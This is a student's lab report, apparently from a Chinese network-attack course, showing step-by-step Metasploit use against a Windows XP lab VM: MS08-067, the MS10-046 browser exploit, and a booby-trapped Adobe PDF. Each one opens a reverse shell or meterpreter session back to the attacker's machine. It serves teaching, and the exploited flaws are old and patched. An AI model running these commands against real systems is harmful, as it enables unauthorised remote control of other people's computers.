20155210 Exp5 MSF基础应用
Exp5 MSF基础应用
一个主动攻击实践,MS08-067
首先利用
msfconsole启用msf终端然后利用
search MS08-067搜索漏洞,会显示相应漏洞模块
如图:

根据上图,我们输入
use exploit/windows/smb/ms08_067_netapi,选择相应的模块然后我们可以使用
show payloads,查看可以使用的模块
如图:

然后根据上图,为获取靶机的shell,所以利用
set payload generic/shell_reverse_tcp然后输入
show options,查看配置信息,知道我们需要配置RHOST,LHOST,LPORT,target
如图:

输入
set RHOST 192.168.241.138
set LHOST 192.168.241.134
set LPORT 5210
进行配置
然后我们再次利用
show options,查看配置信息
如图:

然后
exploit进行监听
如图:

- 如果出现如下情况,关闭防火墙,就可以解决

针对浏览器的攻击,ms10_046
起初我打算做ms11_050,攻击IE浏览器,但是IE8.0版本,不能成功,可能是IE8.0已经修复相关漏洞了。
所以我选择了ms10_046,首先输入
search ms10_046查找漏洞
如图:

由于我们要对浏览器进行攻击,所以我们输入
use use exploit/windows/browser/ms10_046_shortcut_icon_然后我们输入
show payloads,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp
如图:

我们利用
show options查询需要配置的有,LPORT,LHOST,SRVHOST输入
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5210
进行配置
- 再次查看配置信息
如图:

- 然后输入
exploit生成URL
如图:

在windows端访问该URL,kali端如图:

输入
sessions,可看到一个ID为1的连接
如图:

然后输入
session -i 1,接入ID为1的连接,输入shell,获取成功。
如图:

针对客户端的攻击
首先还是先利用
search adobe进行搜索
如图:

然后进行选择,我选择的是
use windows/fileformat/adobe_flashplayer_button

然后
set payload windows/meterpreter/reverse_tcp,设置所用荷载,利用show options查看所要配置的信息
如图:

输入如下代码,对LHOST,LPORT,FILENAME进行配置
set LHOST 192.168.241.134
set LPORT 5210
set FILENAME 20155210.pdf
输入
exploit,生成20155210.pdf文件
如图:

输入
use exploit/multi/handler,进入监听,并设置监听端口,主机号在windows端,打开20155210.pdf,成功回连
如图:

辅助模块应用
- 首先利用
show auxiliary,查看辅助模块

我选择的是
scanner/dns/dns_amp,扫描dns输入
show options,查看配置

输入
exploit进行监听

基础问题
用自己的话解释什么是exploit,payload,encode
exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击
payload:相当于shellcode前身,也就是后门的模板
encode:对payload进行编码
实验体会
我们应该尽可能的,去更新最新版的软件和系统,否则就会给黑客可乘之机。
比如,我们做的实验都是基于xp系统的,但是如果对win7、8、10,进行攻击则无效。
比如,我在做实验2时,想做老师给的例子,但是那个漏洞对IE8.0不好使。
我们没有一个可以针对现用系统或者软件的渗透攻击库,离实战还是很远的
20155210 Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用
目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
随机推荐
- 个人理解的Lambda表达式的演化过程
之前在组内进行过相关分享,为防止以后再单独整理,故在此将自己的PPT内容存放下. 所以,多数代码都是以图片的方式展现. 委托 什么是委托? 定义:委托是方法的抽象,它存储的就是一系列具有相同签名和返回 ...
- Postman Postman测试接口之JSON结构化数据提交
Postman测试接口之JSON结构化数据提交 by:授客 QQ:1033553122 本文主要是针对结构比较复杂一点的JSON协议数据的提交做个简单说明 举例: 用户下订单接口 接口方向 客户端 ...
- Unity Frame Debugger连接Android真机调试
当用Profiler分析到不是代码导致的性能问题,当前场景最大的性能瓶颈是渲染时,或者自己写的Shader要调试时,都可以用Frame Debugger进行调试. 按下列步骤设置打包,既可以用Prof ...
- (Stanford CS224d) Deep Learning and NLP课程笔记(二):word2vec
本节课将开始学习Deep NLP的基础--词向量模型. 背景 word vector是一种在计算机中表达word meaning的方式.在Webster词典中,关于meaning有三种定义: the ...
- nopcommerce
nopcommerce是国外的一个高质量的开源b2c网站系统,基于EntityFramework4.0和MVC3.0,使用Razor模板引擎,有很强的插件机制,包括支付配送功能都是通过插件来实现的,基 ...
- 下载 VM 模板
使用门户或 PowerShell 在 Azure 中创建 VM 时,系统会自动创建一个 Resource Manager 模板. 可以使用此模板快速复制部署. 该模板包含有关资源组中所有资源的信息. ...
- 为何SQL SERVER使用sa账号登录还原数据库BAK文件失败,但是使用windows登录就可以
今天发现一个问题,就是公司开发服务器上的sql server使用sa账号登录后,还原一个数据库bak文件老是报错,错误如下: TITLE: Microsoft SQL Server Managemen ...
- Questions about UIUC and USC
Questions about UIUC and USC I am admitted to University of Illinois at Urbana-Champaign (UIUC) Prof ...
- 【QT5】 第一个hello world 程序
#include <QApplication> #include <QWidget> #include <QPushButton> int main(int arg ...
- 读高性能JavaScript编程 第二章 让我知道了代码为什么要这样写
代码为什么要这样写? function initUI(){ var doc = document, bd = doc.body, links = doc.getElementsByTagName_r( ...